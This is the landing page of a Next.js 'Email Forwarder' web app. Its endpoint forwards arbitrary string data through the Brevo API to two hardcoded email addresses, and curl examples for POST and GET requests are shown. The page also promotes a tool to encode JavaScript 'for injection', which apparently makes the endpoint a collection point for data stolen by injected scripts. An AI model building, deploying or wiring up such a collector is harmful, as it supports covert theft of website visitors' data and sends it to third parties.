📧 Email Forwarder - Next.js

🚀 API Endpoint

URL: /api/email

Methods: POST, GET

Features: String data forwarding via Brevo API

Default Recipients: lazcop61@hotmail.com, disabledshark@gmail.com

📝 Send Test Email

Leave empty to send to default recipients: lazcop61@hotmail.com, disabledshark@gmail.com

🔧 API Usage Examples

🔓 JavaScript Decoder Tool

Use our decoder tool to encode/decode JavaScript for injection:

🚀 Open Decoder Tool

POST Request (with custom recipient):

curl -X POST https://your-domain.com/api/email \
  -H "Content-Type: application/json" \
  -d '{
    "data": "Your string data here",
    "to": "custom@example.com",
    "subject": "Optional subject"
  }'

POST Request (default recipients):

curl -X POST https://your-domain.com/api/email \
  -H "Content-Type: application/json" \
  -d '{
    "data": "Your string data here",
    "subject": "Optional subject"
  }'

GET Request:

curl "https://your-domain.com/api/email?data=Your%20data&to=recipient@example.com"

Default Recipients:

  • lazcop61@hotmail.com
  • disabledshark@gmail.com